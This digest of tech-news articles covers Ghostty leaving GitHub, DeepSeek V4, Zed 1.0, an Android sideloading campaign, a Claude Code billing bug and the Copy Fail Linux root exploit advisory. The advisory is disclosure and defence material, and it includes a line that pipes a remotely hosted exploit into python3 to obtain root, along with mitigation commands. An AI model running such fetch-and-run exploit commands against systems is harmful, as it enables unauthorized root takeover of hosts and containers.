10 interesting stories served every morning and every evening.

Ghostty Is Leaving GitHub

mitchellh.com

Writing this makes me irrationally sad, but Ghostty will be leaving GitHub[1].

I'm GitHub user 1299, joined Feb 2008.

Since then, I've opened GitHub every single day. Every day, multiple times per day, for over 18 years. Over half my life. A handful of exceptions in there (I'd love to see the data), but I can't imagine more than a week per year.

GitHub is the place that has made me the most happy. I always made time for it. When I went through tough breakups? I lost myself in open source… on GitHub. During college at 4 AM when everyone is passed out? Let me get one commit in. During my honeymoon while my wife is still asleep? Yeah, GitHub. It's where I've historically been happiest and wanted to be.

Even the annoying stuff! Some people doom scroll social media. I've been doom scrolling GitHub issues since before that was a word. On vacations I'd have bookmarks of different projects on GitHub I wanted to study. Not just source code, but OSS processes, how other maintainers react to difficult situations. Etc. Believe it or not, I like this.

Some might call this sick, but my hobby and work and passion all align, and for most of my life they got to also live in one place on the internet: GitHub.

Did you know I started Vagrant (my first successful open source project) in large part because I hoped it would get me a job at GitHub? It's no secret, I've said this repeatedly, and in my first public talk about Vagrant, when I was a mere 20 years old, I joked "maybe GitHub will hire me if it's good!"

GitHub was my dream job. I didn't ever get to work there (not their fault). But it was the perfect place I wanted to be. The engineers were incredible, the product was incredible, and it was something I lived and breathed every day. I still do and consistently have… for these 18 years. Enough time for an entire human to become an adult, all on GitHub.

Lately, I've been very publicly critical of GitHub. I've been mean about it. I've been angry about it. I've hurt people's feelings. I've been lashing out. Because GitHub is failing me, every single day, and it is personal. It is irrationally personal. I love GitHub more than a person should love a thing, and I'm mad at it. I'm sorry about the hurt feelings to the people working on it.

I've felt this way for a long time, but for the past month I've kept a journal where I put an "X" next to every date where a GitHub outage has negatively impacted my ability to work[2]. Almost every day has an X. On the day I am writing this post, I've been unable to do any PR review for ~2 hours because there is a GitHub Actions outage[3]. This is no longer a place for serious work if it just blocks you out for hours per day, every day.

It's not a fun place for me to be anymore. I want to be there but it doesn't want me to be there. I want to get work done and it doesn't want me to get work done. I want to ship software and it doesn't want me to ship software. I want it to be better, but I also want to code. And I can't code with GitHub anymore. I'm sorry. After 18 years, I've got to go. I'd love to come back one day, but this will have to be predicated on real results and improvements, not words and promises.

I'll share more details about where the Ghostty project will be moving to in the coming months. We have a plan but I'm also very much still in discussions with multiple providers (both commercial and FOSS).

It'll take us time to remove all of our dependencies on GitHub and we have a plan in place to do it as incrementally as possible. We plan on keeping a read-only mirror available on GitHub at the current URL.

My personal projects and other work will remain on GitHub for now. Ghostty is where I, our maintainers, and our open source community are most impacted, so that is the focus of this change. We'll see where it goes after that.

Footnotes

1. The timing of this is coincidental with the large outage on April 27, 2026. We've been discussing and putting together a plan to leave GitHub for months, and this blog post was written over a week ago. We only made the final decision this week. ↩


2. To the "Git is distributed!" crowd: the issue isn't Git, it's the infrastructure we rely on around it: issues, PRs, Actions, etc. ↩


3. This is not the large Elasticsearch outage they had on April 27, 2026. This blog post was written a week before that, so this was a different outage. ↩


DeepSeek V4 Preview Release | DeepSeek API Docs

api-docs.deepseek.com

🚀 DeepSeek-V4 Preview is officially live & open-sourced! Welcome to the era of cost-effective 1M context length.

🔹 DeepSeek-V4-Pro: 1.6T total / 49B active params. Performance rivaling the world's top closed-source models.

🔹 DeepSeek-V4-Flash: 284B total / 13B active params. Your fast, efficient, and economical choice.

Try it now at chat.deepseek.com via Expert Mode / Instant Mode. API is updated & available today!

📄 Tech Report: https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro/blob/main/DeepSeek_V4.pdf

🤗 Open Weights: https://huggingface.co/collections/deepseek-ai/deepseek-v4

DeepSeek-V4-Pro

🔹 Enhanced Agentic Capabilities: Open-source SOTA in agentic coding benchmarks.

🔹 Rich World Knowledge: Leads all current open models, trailing only Gemini-3.1-Pro.

🔹 World-Class Reasoning: Beats all current open models in Math/STEM/Coding, rivaling top closed-source models.

DeepSeek-V4-Flash

🔹 Reasoning capabilities closely approach V4-Pro.

🔹 Performs on par with V4-Pro on simple agent tasks.

🔹 Smaller parameter size, faster response times, and highly cost-effective API pricing.

Structural Innovation & Ultra-High Context Efficiency

🔹 Novel Attention: Token-wise compression + DSA (DeepSeek Sparse Attention).

🔹 Peak Efficiency: World-leading long context with drastically reduced compute & memory costs.

🔹 1M Standard: 1M context is now the default across all official DeepSeek services.

Dedicated Optimizations for Agent Capabilities

🔹 DeepSeek-V4 is seamlessly integrated with leading AI agents like Claude Code, OpenClaw & OpenCode.

🔹 Already driving our in-house agentic coding at DeepSeek.

The figure below showcases a sample PDF generated by DeepSeek-V4-Pro.

API is Available Today!

🔹 Keep base_url, just update model to deepseek-v4-pro or deepseek-v4-flash.

🔹 Supports OpenAI ChatCompletions & Anthropic APIs.

🔹 Both models support 1M context & dual modes (Thinking / Non-Thinking): https://api-docs.deepseek.com/guides/thinking_mode

⚠️ Note: deepseek-chat & deepseek-reasoner will be fully retired and inaccessible after Jul 24th, 2026, 15:59 (UTC time). (Currently routing to deepseek-v4-flash non-thinking/thinking.)

🔹 Amid recent attention, a quick reminder: please rely only on our official accounts for DeepSeek news. Statements from other channels do not reflect our views.

🔹 Thank you for your continued trust. We remain committed to long-termism, advancing steadily toward our ultimate goal of AGI.

Zed is 1.0 - Zed Blog

zed.dev

April 29th, 2026

To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn't make Atom better than the platform it was built on.

So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.

Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn't going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We've added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That's part of what gives us the confidence to declare version 1.0.

What 1.0 Means

Developers expect a modern editor to support dozens of languages and their ecosystems, with endless variations and edge cases across every stack: Git integration, SSH remoting, a debugger, and, yes, rainbow brackets. We've spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.

Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you've come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor's foundation instead of bolting it on top.

We're also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.

1.0 doesn't mean "done". It also doesn't mean "perfect". It means we've reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it's ever been, and still more performant.

Where We’re Going

Our vision hasn't changed since we started: we're building the most performant and collaborative coding environment. What's changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.

Building our own foundations is what got us to 1.0, and it's also what makes the next chapter possible. We're actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it's generated.

This vision depends on deep ownership of our fundamental primitives. It's not an experience we'd be able to ship inside of someone else's browser engine.

A Milestone, Not a Finish Line

We've shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.

We'll keep shipping every week, the way we always have. The list of things to build will never end, and that's exactly how we like it. Each release moves the craft forward.

If you want to try Zed, download now. If you want to help us build it, join us!


Your First API Call | DeepSeek API Docs

api-docs.deepseek.com

The DeepSeek API uses an API format compatible with OpenAI/Anthropic. By modifying the configuration, you can use the OpenAI/Anthropic SDK, or software compatible with the OpenAI/Anthropic API, to access the DeepSeek API.

* The model names deepseek-chat and deepseek-reasoner will be deprecated on 2026/07/24. For compatibility, they correspond to the non-thinking mode and thinking mode of deepseek-v4-flash, respectively.

Invoke The Chat API​

Once you have obtained an API key, you can access the DeepSeek model using the following example scripts in the OpenAI API format. This is a non-streaming example; you can set the stream parameter to true to get a streaming response.

For examples using the Anthropic API format, please refer to Anthropic API.

curl

curl https://api.deepseek.com/chat/completions \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer ${DEEPSEEK_API_KEY}" \
  -d '{
        "model": "deepseek-v4-pro",
        "messages": [
          {"role": "system", "content": "You are a helpful assistant."},
          {"role": "user", "content": "Hello!"}
        ],
        "thinking": {"type": "enabled"},
        "reasoning_effort": "high",
        "stream": false
      }'
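The docs list python and nodejs variants alongside curl, but only the curl tab survived extraction. As a rough Python equivalent, the sketch below assembles the same request body as the curl example; the helper name build_chat_payload is illustrative, and the commented SDK call at the end is an untested assumption based on the stated OpenAI compatibility, not official sample code.

```python
import json


def build_chat_payload(prompt: str, model: str = "deepseek-v4-pro") -> dict:
    """Assemble the JSON body shown in the curl example above."""
    return {
        "model": model,
        "messages": [
            {"role": "system", "content": "You are a helpful assistant."},
            {"role": "user", "content": prompt},
        ],
        "thinking": {"type": "enabled"},  # Thinking mode on
        "reasoning_effort": "high",
        "stream": False,                  # set True for a streamed response
    }


if __name__ == "__main__":
    payload = build_chat_payload("Hello!")
    print(json.dumps(payload, indent=2))
    # To actually send it (sketch, assuming the OpenAI SDK is installed):
    #   from openai import OpenAI
    #   client = OpenAI(api_key="...", base_url="https://api.deepseek.com")
    #   resp = client.chat.completions.create(
    #       model=payload["model"], messages=payload["messages"],
    #       extra_body={"thinking": payload["thinking"]})
```

Non-standard fields such as thinking are not named parameters in the OpenAI SDK, so they would likely need to go through extra_body as shown.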

Keep Android Open

keepandroidopen.org

Your phone is about to stop being yours.

124 days until lockdown

Starting September 2026, a silent update, nonconsensually pushed by Google, will block every Android app whose developer hasn't registered with Google, signed their contract, paid up, and handed over government ID.

Every app and every device, worldwide, with no opt-out.


What Google is do­ing

In August 2025, Google announced a new requirement: starting September 2026, every Android app developer must register centrally with Google before their software can be installed on any device. Not just Play Store apps: all apps. This includes apps shared between friends, distributed through F-Droid, built by hobbyists for personal use. Independent developers, church and community groups, and hobbyists alike will all be frozen out of being able to develop and distribute their software.

Registration requires:

Paying a fee to Google

Agreeing to Google's Terms and Conditions

Surrendering your government-issued identification

Providing evidence of your private signing key

Listing all current and all future application identifiers

If a developer does not comply, their apps get silently blocked on every Android device worldwide.

Who this hurts

You

You bought an Android phone because Google told you it was open. You could install what you wanted, and that was the deal.

Google is now rewriting that deal, retroactively, on hardware you already own. After the update lands, you can only run software that Google has pre-approved. On your phone: your property, that you paid for.

Independent developers

A teenager's first app, a volunteer's privacy tool, or a company's confidential internal beta. It doesn't matter. After September 2026, none of these can be installed without Google's blessing.

F-Droid, home to thousands of free and open-source Android apps, has called this an "existential" threat. Cory Doctorow calls it "Darth Android".

Governments & civil so­ci­ety

Google has a documented track record of complying when authoritarian regimes demand app removals. With this program, the software that runs your country's institutions will exist at the pleasure of a single unaccountable foreign corporation.

The EFF calls app gatekeeping "an ever-expanding pathway to internet censorship."

Google's "escape hatch" is a trap door

Google says "power users" can still "install" unverified apps. Here's what that actually looks like:

Delve into System Settings, find Developer Options

Tap the build number seven times to enable Developer Mode

Dismiss scare screens about coercion

Enter your PIN

Restart the device

Wait 24 hours

Come back, dismiss more scare screens

Pick "allow temporarily" (7 days) or "allow indefinitely"

Confirm, again, that you understand "the risks"

Nine steps. A mandatory 24-hour cooling-off period. For installing software on a device you own.

Worse: this flow runs entirely through Google Play Services, not the Android OS. Google can change it, tighten it, or kill it at any time, with no OS update required and no consent needed. And as of today, it hasn't shipped in any beta, preview, or canary build. It exists only as a blog post and some mockups.

This is big­ger than Android

If Google can retroactively lock down billions of devices that were sold as open platforms, every hardware manufacturer on the planet is watching.

The principle being established: the company that made your device gets to decide, after you've bought it, what software you're allowed to run. In software, this is called a "rug pull"; but at least you could always install competing software. In hardware, it is a fait accompli that strips you of your agency and renders you powerless to the whims of a single unaccountable gatekeeper and convicted monopolist.

Android's openness was never just a feature. It was the promise that distinguished it from iPhone. Millions chose Android for exactly that reason. Google is now revoking that promise unilaterally, on devices already in people's pockets, because they've decided they have enough market dominance and regulatory capture to get away with it.

Ars Technica: "Google's Apple envy threatens to dismantle Android's open legacy."

But wait, isn't this…

"…just about security?"

The security rationale is a smokescreen. Google Play Protect already scans for malware independent of developer identity. Requiring a government ID doesn't make code safer. It makes developers identifiable and controllable. Malware authors can register. Indie developers and dissidents often can't. The EFF is blunt: identity-based gatekeeping is a censorship tool, not a security one.

"…still sideloading if you use the advanced flow?"

Nine steps, a 24-hour wait, buried in Developer Options, delivered through a proprietary service that Google can revoke whenever they want. That's not sideloading. That's a deterrence mechanism built to ensure almost nobody completes it. And since it runs through Play Services rather than the OS, Google can tighten or kill it silently.

"…only a problem if you have something to hide?"

Whistleblowers, journalists, and activists under authoritarian governments will be the first victims. People in domestic abuse situations are next. All these groups have legitimate reasons to distribute or use software without putting their legal identity in a Google database. Anonymous open-source contribution is a tradition older than Google itself. This policy ends it on Android.

"…the same thing Apple does?"

Apple has been a walled garden from day one. People chose Android because it was different. "Apple does it too" is a race to the bottom and a weak tu quoque argument. And under regulatory pressure (the EU's Digital Markets Act), even Apple is being forced to open up. Google is moving in the opposite direction: attempting to further entrench its gatekeeping status.

"…just $25 and some paperwork?"

Maybe, if you're a developer in the US with a credit card and a driver's license. Try being a student in sub-Saharan Africa, or a dissident in Myanmar, or a volunteer maintaining a community health app. The cost isn't only financial: you're surrendering government ID and evidence of your signing keys to a company that routinely complies with government demands to remove apps and expose developers.

Fight back

Everyone

Install F-Droid on every Android device you own. Alternative stores only survive if people actually use them.

Contact your regulators. Regulators worldwide are genuinely concerned about monopolies and the centralization of power in the tech sector, and want to hear directly from individuals who are affected and concerned.

Share this page. Link to keepandroidopen.org everywhere.

Push back on astroturfers. The "well, actually…" crowd is out in force. Don't let them set the narrative.

Sign the change.org petition and join the over 100,000 signatories who have made their voices heard.

Read and share our open letter

Tell Google what you think of this through their own developer verification survey (for all the good that will do).

Developers

Do not sign up. Don't join the program by signing up for the Android Developer Console and agreeing to their irrevocable Terms and Conditions. Don't verify your identity. Don't play ball.

Google's plan only works if developers comply. Don't.

Talk other developers and organizations out of signing up.

Add the FreeDroidWarn library to your apps to warn users.

Run a website? Add the countdown banner.

Google employees

If you know something about the program's technical implementation or internal rationale, contact tips@keepandroidopen.org from a non-work machine and a non-Gmail account. Strict confidence guaranteed.

All those op­posed…

69 organizations from 21 countries have signed the open letter

Read the full open letter and thank the signatories →

What they’re say­ing

Tech press

"Google will verify Android developers distributing apps outside the Play store" The Verge

"This will wipe out Android as an actual alternative to Apple's mobile OS offerings." Hackaday

"Open letter warns mandatory registration threatens 'innovation, competition, privacy and user freedom'" Infosecurity Magazine

"Google is restricting one of Android's most important features, and users are outraged" SlashGear

"Keep Android Open — defense against Google's ban on anonymous apps" heise online

"Google's dev registration plan 'will end the F-Droid project'" The Register

"Keep Android Open" Linux Magazine

"Sideloading on Android? Soon It'll Be Like a TSA Check for Apps" Android Headlines

"Over 67 groups urge the company to drop ID checks for apps distributed outside Play" The Register

"Android app store provider Aptoide hits Google with fresh lawsuit alleging monopoly and anticompetitive chokehold" Benzinga

"Google will make you wait 24 hours to sideload Android apps" How-To Geek

"Google will require developer verification for Android apps outside the Play Store" TechCrunch


HERMES.md in git commit messages causes requests to route to extra usage billing instead of plan quota

github.com

Summary

When a git repository's recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to "extra usage" billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).

Environment

Claude Code v2.1.119

macOS (Apple Silicon)

Max 20x plan ($200/month)

Model: claude-opus-4-6[1m] (also reproduces with claude-opus-4-7)

Reproduction

Minimal reproduction — no project files needed:

# This FAILS with "out of extra usage" (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m "add HERMES.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => API Error: 400 "You're out of extra usage…"

# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m "add hermes.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => "Hello!"

# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass

The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.

What triggers it vs. what doesn't

Impact

$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota

Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity

The error message ("out of extra usage") gives no indication that content-based routing is the cause, making this extremely difficult to diagnose

Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits

Expected behavior

API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.

How I found this

Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
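The isolation step amounts to delta debugging over the commit history. A minimal sketch of the idea, with a hypothetical function name and a stand-in predicate (the real test was building throwaway repos and running claude -p against them):

```python
def isolate_trigger(messages, request_fails):
    """Binary-search a list of commit messages down to the single one
    that makes request_fails(subset) return True.

    Assumes exactly one message in `messages` is the trigger, which
    matches the behavior observed in this issue.
    """
    candidates = list(messages)
    while len(candidates) > 1:
        mid = len(candidates) // 2
        left = candidates[:mid]
        # Keep whichever half still reproduces the failure.
        candidates = left if request_fails(left) else candidates[mid:]
    return candidates[0]


if __name__ == "__main__":
    history = ["init", "add HERMES.md", "fix tests", "bump version"]
    # Stand-in predicate: the real one created a repo with these commit
    # messages and checked whether the request hit the extra-usage error.
    fails = lambda msgs: any("HERMES.md" in m for m in msgs)
    print(isolate_trigger(history, fails))  # -> add HERMES.md
```

Each round halves the number of candidate messages, so even a long history needs only a logarithmic number of throwaway repos.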

Copy Fail — 732 Bytes to Root

copy.fail

CVE-2026-31431

100% reliable

every distro since 2017

container escape primitive

732 bytes

found by Xint Code

Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.

One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.

The demo

Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.


Who is af­fected

If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.

Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro's default config, so the entire 2017 → patch window is in play out of the box.

Distributions we directly verified:

These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.

Should you patch first?

High

Multi-tenant Linux hosts

Shared dev boxes, shell-as-a-ser­vice, jump hosts, build servers — any­where mul­ti­ple users share a ker­nel.

any user be­comes root

High

Kubernetes / con­tainer clus­ters

The page cache is shared across the host. A pod with the right prim­i­tives com­pro­mises the node and crosses ten­ant bound­aries.

cross-con­tainer, cross-ten­ant

High

CI run­ners & build farms

GitHub Actions self-hosted run­ners, GitLab run­ners, Jenkins agents — any­thing that ex­e­cutes un­trusted PR code as a reg­u­lar user, on a shared ker­nel.

a PR be­comes root on the run­ner

High

Cloud SaaS run­ning user code

Notebook hosts, agent sand­boxes, server­less func­tions, any ten­ant-sup­plied con­tainer or script.

ten­ant be­comes host root

Medium

Standard Linux servers

Single-tenant pro­duc­tion where only your team has shell ac­cess.

in­ter­nal LPE; chains with web RCE or stolen creds

Lower

Single-user lap­tops & work­sta­tions

You’re al­ready the only user. The bug does­n’t grant re­mote at­tack­ers ac­cess by it­self, but any lo­cal code ex­e­cu­tion be­comes root.

post-ex­ploita­tion step-up

Exploit

The PoC is published so defenders can verify their own systems and validate vendor patches.

Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don't run it on production.

copy_fail_exp.py (732 B)

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1].

sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9

Quick run:

$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)

Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431

Mitigation

Patch first. Update your distribution's kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.

Before you can patch: disable the algif_aead module.

# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true

What does this break? For the vast majority of systems — nothing measurable.

Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don't go through AF_ALG.

May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.

Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn't already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.

For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
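As a quick sanity check that the module blacklist or seccomp block took effect, the sketch below tries to create an AF_ALG socket and bind it to an AEAD algorithm, which is what the exploit needs. This is an illustrative check, not part of the official advisory; on non-Linux platforms AF_ALG does not exist, so it simply reports the interface as unreachable.

```python
import socket


def algif_aead_reachable() -> bool:
    """Return True if this kernel hands the current user an AF_ALG AEAD
    socket, i.e. the interface the exploit needs is still exposed."""
    if not hasattr(socket, "AF_ALG"):
        return False  # non-Linux platform: AF_ALG does not exist
    try:
        s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    except OSError:
        return False  # address family blocked (e.g. by seccomp)
    try:
        # Binding to an AEAD algorithm makes the kernel resolve algif_aead;
        # with the module disabled via modprobe.d this raises OSError.
        s.bind(("aead", "gcm(aes)"))
        return True
    except OSError:
        return False
    finally:
        s.close()


if __name__ == "__main__":
    state = "reachable" if algif_aead_reachable() else "not reachable"
    print(f"algif_aead is {state} from this account")
```

A "not reachable" result after applying the modprobe.d snippet above suggests the mitigation is active for this user; the kernel patch is still the real fix.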


Disclosure timeline

2026-03-23: Reported to Linux kernel security team

2026-03-24: Initial acknowledgment

2026-03-25: Patches proposed and reviewed

2026-04-01: Patch committed to mainline

2026-04-22: CVE-2026-31431 assigned

2026-04-29: Public disclosure (https://copy.fail/)

Xint Code

Is your software AI-era safe?

Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.

The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way: one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.

Track record

0-day RCE (ZeroDay Cloud): swept the database category (Redis, PostgreSQL, MariaDB) with zero human intervention.

Top 3 (DARPA AIxCC): finalist in the AI Cyber Challenge hosted by the DoD's DARPA.

DEF CON CTF: most-winning team in DEF CON CTF history.

The West Forgot How to Build. Now It's Forgetting Code

techtrenches.dev

In 2023, Raytheon's president stood at the Paris Air Show and described what it took to restart Stinger missile production. They brought back engineers in their 70s to teach younger workers how to build a missile from paper schematics drawn during the Carter administration. Test equipment had been sitting in warehouses for years. The nose cone still had to be attached by hand, exactly as it was forty years ago.

The Pentagon hadn't bought a new Stinger in twenty years. Then Russia invaded Ukraine, and suddenly everyone needed them. The production line was shut down. The electronics were obsolete. The seeker component was out of production. An order placed in May 2022 wouldn't deliver until 2026. Four years. Not because of money. Because the people who knew how to build them retired a decade earlier and nobody replaced them.

I run engineering teams in Ukraine. My people lived the other side of this equation. Not the factory floor. The receiving end. While Raytheon was struggling to restart production from forty-year-old blueprints, the US was shipping thousands of Stingers to Ukraine. RTX CEO Greg Hayes: ten months of war burned through thirteen years' worth of Stinger production. I've seen this pattern before. It's happening in my industry right now.

In March 2023, the EU promised Ukraine one million artillery shells within twelve months. European production capacity sat at 230,000 shells per year. Ukraine was consuming 5,000 to 7,000 rounds per day. Anyone with a calculator could see this wouldn't work.
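The calculator check is quick. A sketch using only the figures from the paragraph above (variable names are mine):

```python
# All numbers come from the text: EU capacity, the pledge, Ukraine's burn rate.
eu_capacity = 230_000                 # EU production, shells per year
pledge = 1_000_000                    # promised to Ukraine within 12 months
burn_low, burn_high = 5_000, 7_000    # Ukraine's consumption, rounds per day

print(f"Pledge covered by one year of EU production: {eu_capacity / pledge:.0%}")
print(f"Annual consumption: {burn_low * 365:,} to {burn_high * 365:,} shells")
```

One year of production covers under a quarter of the pledge, while consumption runs to roughly two and a half times the pledge per year.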

By the deadline, Europe delivered about half. Macron called the original promise reckless. An investigation by eleven media outlets across nine countries found actual production capacity was roughly one-third of official EU claims. The million-shell mark wasn't hit until December 2024, nine months late.

It wasn't one bottleneck. It was all of them. France had halted domestic propellant production in 2007. Seventeen years of nothing. Europe's single major TNT producer was in Poland. Germany had two days of ammunition stored. A Nammo plant in Denmark was shut down in 2020 and had to be restarted from scratch. The entire continent's defense industry had been optimized for making small batches of expensive custom products. Nobody planned for volume. Nobody planned for crisis.

The U.S. wasn't much better. One plant in Scranton, one facility in Iowa for explosive fill, no domestic TNT production since 1986. Billions of investment later, production still hadn't hit half the target.

This wasn't an accident. In 1993, the Pentagon told defense CEOs to consolidate or die. Fifty-one major defense contractors collapsed into five. Tactical missile suppliers went from thirteen to three. Shipbuilders from eight to two. The workforce fell from 3.2 million to 1.1 million. A 65% cut.

The ammunition supply chain had single points of failure everywhere. One manufacturer for 155mm shell casings, sitting in Coachella, California, on the San Andreas Fault. One facility in Canada for propellant charges. Optimized for minimum cost with zero margin for surge. On paper, efficient. In practice, one bad day away from collapse.

Then there's Fogbank. A classified material used in nuclear warheads. Produced from 1975 to 1989, then the facility was shut down. When the government needed to reproduce it for a warhead life extension program, they discovered they couldn't. A GAO report found that almost all staff with production expertise had retired, died, or left the agency. Few records existed.

After $69 million in cost overruns and years of failed attempts, they finally produced viable Fogbank. Then discovered the new batch was too pure. The original process had relied on an unintentional impurity that was critical to the material's function. Nobody knew. Not the engineers trying to reproduce it. Not even the original workers who made it decades earlier. Los Alamos called it an unknowing dependency in the original process.

A nuclear weapons program lost the ability to make a material it invented. The knowledge didn't just leave with people. It was never fully understood by anyone.

(Correction: the original version stated that the workers who made Fogbank knew about the impurity. They didn't. The dependency was unwitting, which makes the knowledge-loss argument stronger, not weaker. Thanks to John F. in the comments for catching this.)

I read the Fogbank story and recognized it immediately. Not the nuclear material. The pattern. Build capability over decades. Find a cheaper substitute. Let the human pipeline atrophy. Enjoy the savings. Then watch it all collapse when a crisis demands what you optimized away.

In defense, the substitute was the peace dividend. In software, it's AI.

I wrote about the talent pipeline collapse before. The hiring numbers and the junior-to-senior problem are documented. So is the comprehension crisis. What I didn't have was the right historical parallel. Now I do.

And it tells you something the hiring data doesn't: how long rebuilding actually takes.

Every major defense production ramp-up took three to five years for simple systems. Five to ten for complex ones. Stinger: thirty months minimum from order to delivery. Javelin: four and a half years to less than double production. 155mm shells: four years and still not at target despite five billion dollars invested. France only restarted propellant production in 2024, seventeen years after shutting it down.

Money was never the constraint. Knowledge was. RAND found that 10% of technical skills for submarine design need ten years of on-the-job experience to develop, sometimes following a PhD. Apprenticeships in defense trades take two to four years, with five to eight years to reach supervisory competence.

Now map that onto software. A junior developer needs three to five years to become a competent mid-level engineer. Five to eight years to become senior. Ten or more to become a principal or architect. That timeline can't be compressed by throwing money at it. It can't be compressed by AI either.

A METR randomized controlled trial found that experienced developers using AI coding tools actually took 19% longer on real-world open source tasks. Before starting, they predicted AI would make them 24% faster. The gap between prediction and reality was 43 percentage points. When researchers tried to run a follow-up, a significant share of developers refused to participate if it meant working without AI. They couldn't imagine going back.

The software industry is in year three of the same optimization. Salesforce said it won't hire more software engineers in 2025. A LeadDev survey found 54% of engineering leaders believe AI copilots will reduce junior hiring long-term. A CRA survey of university computing departments found 62% reported declining enrollment this year.

I see it in code review. Review is now the bottleneck. AI generates code fast. Humans review it slowly. The industry's answer is predictable: let AI review AI's code. I'm not doing that. I've reworked our pull request templates instead. Every PR now has to explain what changed, why, what type of change it is, with screenshots of before and after. Structured context so the reviewer isn't guessing. I'm adding dedicated reviewers per project. More eyes, more chances to catch what the model missed.

But even that doesn't solve the deeper problem. The skills you need to be effective now are different. Technical expertise alone isn't enough anymore. You need people who can take ownership, communicate tradeoffs, and push back on bad suggestions from a machine that sounds very confident. Leadership qualities. Our last hiring round tells you how rare that is: 2,253 candidates, 2,069 disqualified, 4 hired. A 0.18% conversion rate. The combination of technical skill and the judgment to know when the AI is wrong barely exists in the market anymore.

We document everything. Site Books, SDDs, RVS reports, boilerplate modules with full coverage. It works today, because the people reading those docs have the engineering expertise to act on them. What happens when they don't? Honestly, I don't know. Maybe AI in five years is good enough that it won't matter. Maybe the problem stays manageable. I can't predict the capabilities of models in 2031.

